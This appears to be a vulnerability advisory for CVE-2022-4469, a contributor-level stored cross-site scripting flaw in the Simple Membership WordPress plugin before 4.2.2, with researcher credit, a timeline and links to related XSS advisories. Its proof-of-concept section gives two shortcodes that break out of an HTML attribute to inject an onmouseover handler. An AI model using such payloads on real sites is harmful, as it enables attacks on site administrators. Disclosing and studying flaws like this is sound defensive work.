Simple Membership < 4.2.2 – Contributor+ Stored XSS | CVE 2022-4469 | Plugin Vulnerabilities

Description

The plugin does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admin.

Proof of Concept

1. Exploit shortcode:

[swpm_paypal_subscription_cancel_link merchant_id='1' css_class='" onmouseover="alert(1)"']

Note: The exploit requires a membership plugin user to log in.

2. Exploit shortcode:

[swpm_payment_button id='1' class='" onmouseover="alert(1)"']

Note: The “Braintree Buy Now” payment button uses the “class” parameter. You can add buttons on the "Payments" > "Manage Payment Buttons" page.

Affects Plugins

simple-membership

Fixed in 4.2.2

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Lana Codes

Submitter

Lana Codes

Submitter website

https://lana.codes/

Submitter twitter

Verified

Yes

WPVDB ID

b195c373-1db9-4fd7-98d0-0860dacd189e

Timeline

Publicly Published

2022-12-21 (about 1 years ago)

Added

2022-12-21 (about 1 years ago)

Last Updated

2022-12-21 (about 1 years ago)

Other

Published

Title

Published

2023-02-17

Title

Simple PDF Viewer <= 1.9 - Contributor+ XSS

Published

2022-01-13

Title

PublishPress Capabilities < 2.3.3 - Reflected Cross-Site Scripting

Published

2017-09-19

Title

WordPress 4.2.3-4.8.1 - Authenticated Cross-Site Scripting (XSS) in Visual Editor

Published

2024-02-02

Title

CalculatorPro Calculators <= 1.1.7 - Reflected Cross-Site Scripting via CP_preview_calc

Published

2012-08-08

Title

Mini Mail Dashboard Widget 1.42 - Message Body XSS